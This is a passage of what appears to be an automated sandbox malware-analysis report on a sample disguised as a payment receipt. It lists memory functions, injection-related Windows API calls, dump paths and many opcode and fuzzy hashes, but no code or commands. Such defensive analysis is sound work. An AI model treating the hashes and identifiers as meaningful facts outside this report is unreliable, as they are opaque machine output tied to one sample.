                                                    • Opcode ID: b43c65a70a2dd84d7e932eb963ba8417b99bc38c65c883b2e197c1b1029d312a
                                                    • Instruction ID: 1df848fe7e76934617804c23904c04f4af11ed0866be9cfb5bf8790367f659c9
                                                    • Opcode Fuzzy Hash: b43c65a70a2dd84d7e932eb963ba8417b99bc38c65c883b2e197c1b1029d312a
                                                    • Instruction Fuzzy Hash: 13216A72C002489FDB20DFA9D844AEEFFF5EF88314F248419D559A7250CB399945CFA0
                                                    Function 06EFDA10 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EFDA83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: e942f07d70dbdcadb1fb5fe57ee885b3452b63b98bf07960bf61712718dc0f9b
                                                    • Instruction ID: 49d20b6ff6b69fa8295ccc1e72784855921d283d514e348fdc2d915367aa55ef
                                                    • Opcode Fuzzy Hash: e942f07d70dbdcadb1fb5fe57ee885b3452b63b98bf07960bf61712718dc0f9b
                                                    • Instruction Fuzzy Hash: EB21D3B59006499FDB10DF9AC884ADEFBF4FF48324F108429E958A7250D378AA44CFA5
                                                    Function 06F4A4B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F4A51E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: f7d35be26948e09da469b24d6ace06a85d5d958fc9059f3208ed58595a5dabec
                                                    • Instruction ID: adac58eaf38e712a8ddcd2e0c1905791e1c973f86cd37f230bf4aa1205122f64
                                                    • Opcode Fuzzy Hash: f7d35be26948e09da469b24d6ace06a85d5d958fc9059f3208ed58595a5dabec
                                                    • Instruction Fuzzy Hash: D91137718002499FDB10DFAAC844AEEFFF5EF88314F108419E519A7250C779A940CFA0
                                                    Function 06F49AE0 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 06F49B4A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 371682252946892925b92b9898e435f6e080ec9394b5da2bafbefebb2cf0c8d1
                                                    • Instruction ID: a6445ced078873cdce0afe9009df633fb60313e16df774d66a69635c9b43457f
                                                    • Opcode Fuzzy Hash: 371682252946892925b92b9898e435f6e080ec9394b5da2bafbefebb2cf0c8d1
                                                    • Instruction Fuzzy Hash: AD1149B1D002488FDB20DFAAC8457EEFFF5EF89314F208419C459A7240CB79A945CBA4
                                                    Function 06F49AE8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 06F49B4A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 42bb9c6dea0c4cdf19c8382c761f674aeffb6f2dcbd6d4f8cd33256198fea587
                                                    • Instruction ID: 8d49336bece7ed48e32c20aac2c4c90e96e81055bbe86b110b6a4df01ac7c625
                                                    • Opcode Fuzzy Hash: 42bb9c6dea0c4cdf19c8382c761f674aeffb6f2dcbd6d4f8cd33256198fea587
                                                    • Instruction Fuzzy Hash: 751128B1D002488BDB10DFAAC4457EEFFF5EF88314F208419D519A7240CB79A944CBA5
                                                    Function 06F4E748 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4E7AD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 155823c55e94283300c074f3c86cf2e000b7a811ad665991255272a9ae795b3e
                                                    • Instruction ID: b3549c6e50b8d30d7d9091f5df73ee57dc672672d69a58f85bb1784ca1fb3a8e
                                                    • Opcode Fuzzy Hash: 155823c55e94283300c074f3c86cf2e000b7a811ad665991255272a9ae795b3e
                                                    • Instruction Fuzzy Hash: 301110B58003489FDB20DF99C485BEEBFF8FB48320F20841AD458A7600C379A944CFA1
                                                    Function 06F49CE0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F4E7AD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 07766147ff57d1104407742878690650816c31557148db4df6f7396c800cde1b
                                                    • Instruction ID: a7506c90c4c44bd6475ceeb78e6d0c60aa48372eebaf7e0883d6f253c2c24f9f
                                                    • Opcode Fuzzy Hash: 07766147ff57d1104407742878690650816c31557148db4df6f7396c800cde1b
                                                    • Instruction Fuzzy Hash: EE11F5B58043489FEB10DF99C484BDEBFF8FB48324F108459E518A7641C375A944CFA1
                                                    Function 023EB4E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 023EB546
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 0edb9467d0e112bb0cf1fd0f77fa47552730b12d517cefa2fea3cc8234e01995
                                                    • Instruction ID: ba41bee0e91ff9933270856b7e09ad2971f5b8e934d9ce35cb65a7a050e4b809
                                                    • Opcode Fuzzy Hash: 0edb9467d0e112bb0cf1fd0f77fa47552730b12d517cefa2fea3cc8234e01995
                                                    • Instruction Fuzzy Hash: 83110FB5C002498FDB10DF9AC444A9EFBF5AF89318F10841AD419A7280C379A545CFA1
                                                    Function 05A5DAF8 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 76a83409c305903b25529e138fcbda8f169a9949492ee31a700e23de3a476edc
                                                    • Instruction ID: 40363d4e31e7c73fbcb3cb0b5d771beb247c8433e3391a6bfccadc96178c7f4b
                                                    • Opcode Fuzzy Hash: 76a83409c305903b25529e138fcbda8f169a9949492ee31a700e23de3a476edc
                                                    • Instruction Fuzzy Hash: 78919D71E013188FDB14DFA9C444EAEBBB2FF89324F148069E81AAB351DB349945CB95
                                                    Function 05A5516C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q
                                                    • API String ID: 0-52440209
                                                    • Opcode ID: f08d4736a2136e383fc3dc7a438cd9141b3c7286f3784bd9ad1bacdf45d0a484
                                                    • Instruction ID: a5b9860e6a3e02b4aff657b1cbd86ac57d4c45e1412cc283d53d1312d36f8b3e
                                                    • Opcode Fuzzy Hash: f08d4736a2136e383fc3dc7a438cd9141b3c7286f3784bd9ad1bacdf45d0a484
                                                    • Instruction Fuzzy Hash: 89516F31B002158FCB14EFB99858EBEBBF6FFC4620B548929E429DB355DF3099058751
                                                    Function 05A5F370 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 9aac9ab69c2540caa0fff3f2548115e5734b0e87debe27e22e416a55c226b6f1
                                                    • Instruction ID: 72c86a15d2d43d3f1b5e8b2288b580f06c269cd3e993123e23172d7b705446fe
                                                    • Opcode Fuzzy Hash: 9aac9ab69c2540caa0fff3f2548115e5734b0e87debe27e22e416a55c226b6f1
                                                    • Instruction Fuzzy Hash: A9511DB1A0020ADFDB14DF69D544A9EBBF2FF88321F14C129E929AB254D770E951CF90
                                                    Function 05A52D38 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 13fc79403a276c599c9608fd8b0cdc6a0223f8dae7c0363a199036e2cdf974bd
                                                    • Instruction ID: f16758dc231ca742e5af31d89f3d08250c64b17ddbed770553e08478b5ac3a98
                                                    • Opcode Fuzzy Hash: 13fc79403a276c599c9608fd8b0cdc6a0223f8dae7c0363a199036e2cdf974bd
                                                    • Instruction Fuzzy Hash: C9313C36A0461A8FDF14CF69C484BEEB7F1FF48311F14852AE815E7291DB389985CBA1
                                                    Function 05A5DAE8 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: c85f816fb32b2b1160bd43748491f4b2871d1c8b7af4dc480096e70adccdc48e
                                                    • Instruction ID: d9f4599063471b12e0ace6d5669b75f73f36729029e0aaf66f8f42f97bb9ebbc
                                                    • Opcode Fuzzy Hash: c85f816fb32b2b1160bd43748491f4b2871d1c8b7af4dc480096e70adccdc48e
                                                    • Instruction Fuzzy Hash: 6111CEB0B003158FCF15ABA88984A7DBBB6EF84220B008079CC09EB281DA348D05C7A6
                                                    Function 05A567F0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q
                                                    • API String ID: 0-52440209
                                                    • Opcode ID: 8b15f29581261c9985a70a47f6d0fbaaea53e167ce25f0195112789b70f895b1
                                                    • Instruction ID: 192059d9577b3f5b78bb41e958bab068d798b50cd013b6334802607c2d692f04
                                                    • Opcode Fuzzy Hash: 8b15f29581261c9985a70a47f6d0fbaaea53e167ce25f0195112789b70f895b1
                                                    • Instruction Fuzzy Hash: D5111C31F0020A8BCF14EBA99951DEEBBF6AFC8721B644169C915E7344EB358D06CB91
                                                    Function 05A55D50 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 6c1a1d172c30573428c67cd0e8e5079375749fc8e3a276e67302d0778e5d721a
                                                    • Instruction ID: b0c23139617023709786e437db77f935205ada8bbaf660fcce05654cff05c40f
                                                    • Opcode Fuzzy Hash: 6c1a1d172c30573428c67cd0e8e5079375749fc8e3a276e67302d0778e5d721a
                                                    • Instruction Fuzzy Hash: 4D017830A0520DAFCB04EFB8E549A9C7FF6FF44215F2089A9E84997215EB305A08CB52
                                                    Function 05A55D60 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 7269bda1f02e16a28ffe99aa382f57ba2dbd6b35a8307795b68dfcc842bb86cb
                                                    • Instruction ID: 3ac59f16608b0ac167666146917ff29272e6fff162e6d1185427dd0b1399fbc5
                                                    • Opcode Fuzzy Hash: 7269bda1f02e16a28ffe99aa382f57ba2dbd6b35a8307795b68dfcc842bb86cb
                                                    • Instruction Fuzzy Hash: 6AF08C30A00208EFCB04EFB8E54598CBFF6FF44211B2085A9E80597314EF305A48CB42
                                                    Function 05A538D0 Relevance: .8, Instructions: 781COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a28400e79bfe18e0d874f4a63bf448af9608ec743863e45f6d1bc77de9ace468
                                                    • Instruction ID: a2aaeab95c225aa2cc87e8c14376247d6d98ea16c7f9711dd0ac05bb1bf639b0
                                                    • Opcode Fuzzy Hash: a28400e79bfe18e0d874f4a63bf448af9608ec743863e45f6d1bc77de9ace468
                                                    • Instruction Fuzzy Hash: 06627170F90B818BDB755FB48988FADBBB1BB49320F14492ED5BACB241DB3494C18B45
                                                    Function 05A5B470 Relevance: .2, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08b423e04f7c6c8def9d6921fe139551c12b9da8df5fd0fecaf4c428bc00d3b2
                                                    • Instruction ID: 67529d88a36e1eff24ef03f5584b3182ce43f3bd4a19b01be4cbf239b7ac0f00
                                                    • Opcode Fuzzy Hash: 08b423e04f7c6c8def9d6921fe139551c12b9da8df5fd0fecaf4c428bc00d3b2
                                                    • Instruction Fuzzy Hash: CC8100347106148FCB18EB28D498EA97BF6FF89B15B1541A9E902CB3B5DB71EC05CB90
                                                    Function 05A5C6E0 Relevance: .2, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d4e33415080ab8abc09c6ba5d4efda5ab8126858aead76358e3d9ecba1d22de
                                                    • Instruction ID: 6134c478017be352625e5c314c56a4100af118a4e182519e09e6b80a52348eb4
                                                    • Opcode Fuzzy Hash: 7d4e33415080ab8abc09c6ba5d4efda5ab8126858aead76358e3d9ecba1d22de
                                                    • Instruction Fuzzy Hash: A9818535A10209DFCB04DFA4D898EADBBB5FF89320F158559E902AB364EB709D45CF90
                                                    Function 05A5D850 Relevance: .2, Instructions: 208COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 375b998cefa5c00fa27b7ddb0fceb2a263c5934cb6de3e8242046f2a698509d1
                                                    • Instruction ID: 54cb5589ab4a8cd4fc7bd0e6cc6a18396995f3ee40e60a011e99f2154575ee85
                                                    • Opcode Fuzzy Hash: 375b998cefa5c00fa27b7ddb0fceb2a263c5934cb6de3e8242046f2a698509d1
                                                    • Instruction Fuzzy Hash: A6816E31B04204CFDB24DF68D584EAEB7F2FF88320F1584B9D45AAB655DB30A942CB91
                                                    Function 05A52638 Relevance: .2, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00b2dabbff85158d0e337ea7a932cd11361b33811cc4b09b8849f68f15297864
                                                    • Instruction ID: cbb337ba8661be539087dd18290a8fca87104f9637fb225aec87af319590dcf1
                                                    • Opcode Fuzzy Hash: 00b2dabbff85158d0e337ea7a932cd11361b33811cc4b09b8849f68f15297864
                                                    • Instruction Fuzzy Hash: F5714C39E00619CFDB14DFB9C858BADBBB2FF88310F148569E816A7250EF749945CB90
                                                    Function 05A51710 Relevance: .2, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33d35b15056dab2a14c61be63f558d15c600322a21b1b6f828a03b0f0d40ee7f
                                                    • Instruction ID: e7d5cc2fb1bc28a5b41e4c7c9d96394cf5768d7af4cc6549ef5f6907dea758b4
                                                    • Opcode Fuzzy Hash: 33d35b15056dab2a14c61be63f558d15c600322a21b1b6f828a03b0f0d40ee7f
                                                    • Instruction Fuzzy Hash: 1A517D71A002049FCB24DF69C484FADBBF6FF89310F148169D85AAB361DB75D845CB91
                                                    Function 05A52B38 Relevance: .2, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08a229ace1701810e7fdc7608f4140b59ad65661997018b52985466b5d27ee0c
                                                    • Instruction ID: 166ff24af8ed811a432d2491afb8cb629400c5d9f336477316f668525ac681e4
                                                    • Opcode Fuzzy Hash: 08a229ace1701810e7fdc7608f4140b59ad65661997018b52985466b5d27ee0c
                                                    • Instruction Fuzzy Hash: 14715F78A01208EFCB15DF59D488EAEBBB6BF48724F114498F915AB361DB31EC81CB50
                                                    Function 05A51720 Relevance: .2, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a54baa9468d3e0824952ded211e060c9c0c767c8043999fdc9adad7d8fa441e
                                                    • Instruction ID: aae12631f2bf3dd4bea1c183ddbed9210f777844cb47cadc1ece7aacbf684a04
                                                    • Opcode Fuzzy Hash: 0a54baa9468d3e0824952ded211e060c9c0c767c8043999fdc9adad7d8fa441e
                                                    • Instruction Fuzzy Hash: B85179317002148FCB24EB69D594FAABBBABF89310F104069E85ADB3A1DB75EC45CB51
                                                    Function 05A51F58 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11c66964bf919976fdbb27736ceff56265c7fa9f2c17f0ab39a5baa63e9b2aff
                                                    • Instruction ID: 102c5dea5a48fe33355ad3df5acaec66f274a572181938762256d0934d371f1f
                                                    • Opcode Fuzzy Hash: 11c66964bf919976fdbb27736ceff56265c7fa9f2c17f0ab39a5baa63e9b2aff
                                                    • Instruction Fuzzy Hash: 2E414734B152589FDB24DB69C894EAEBBF6BF49710F1440A9E912EB3A1DB31DC04CB50
                                                    Function 05A52D48 Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72b43f8b5fbe42a625dedbdce5d3a9d70820bdbe69aeac223c871b782be41fb9
                                                    • Instruction ID: 7b9b96409be4ef5884ae5bd46695cb5c90cdf18cabfbba286feb0f6f5dc6a504
                                                    • Opcode Fuzzy Hash: 72b43f8b5fbe42a625dedbdce5d3a9d70820bdbe69aeac223c871b782be41fb9
                                                    • Instruction Fuzzy Hash: A3415F35A0061A8BDF04DF69D444BEEB7F1FF88311F14852AE855E7290DB38D985CB61
                                                    Function 05A52168 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7a8518eb3e745bf3a1f251aa72b5e6d64caa41e082c17881fc606c3a14df2a4
                                                    • Instruction ID: 79a057d072ca94bc34514516a8e07b0b0c2789a22e52a0ee99c70ff0697db9b4
                                                    • Opcode Fuzzy Hash: c7a8518eb3e745bf3a1f251aa72b5e6d64caa41e082c17881fc606c3a14df2a4
                                                    • Instruction Fuzzy Hash: 4141FA38A042288FDB14EBA8C844FDDBBF5BF48714F114054E906BB3A1DB35A805CFA0
                                                    Function 05A55330 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 523239c4600d6b11d084fe4b179b91b63276bc738c42196679b0dd200e48060e
                                                    • Instruction ID: e6c03a8432bd57e207b0200c0118955052f0a606d1eff888f17d896938d9a6a9
                                                    • Opcode Fuzzy Hash: 523239c4600d6b11d084fe4b179b91b63276bc738c42196679b0dd200e48060e
                                                    • Instruction Fuzzy Hash: FA419F71C493A89FDB11DFA8C864BCDBFB1FF49324F19405AD444AB292C3788849CBA5
                                                    Function 05A5AD61 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 64fe0161a002ab80bdb141497219380a2f696b551bb8e239596ec58e652fa26e
                                                    • Instruction ID: dc521f161b54e2ed57c8d5e9185a62e55a47d17c23eef44e69eb71f63356df43
                                                    • Opcode Fuzzy Hash: 64fe0161a002ab80bdb141497219380a2f696b551bb8e239596ec58e652fa26e
                                                    • Instruction Fuzzy Hash: 883103313057408FD726AB389950D667BABAF8621931849BECC97CB295EB34DC05C760
                                                    Function 05A5BFA1 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2cbb27e0f3fa248b092107050d8a1159375586c4f690d41b75f47810ec979b1
                                                    • Instruction ID: 312328926dbab891f09c924d9e0ef1eabf0011d1178dc4b5701d0e5d9f261cfc
                                                    • Opcode Fuzzy Hash: c2cbb27e0f3fa248b092107050d8a1159375586c4f690d41b75f47810ec979b1
                                                    • Instruction Fuzzy Hash: BB411A359206099FCB00EFA8D955EDDBBB1FF49320F108529E845B7254EB30AA98CF91
                                                    Function 05A5B460 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
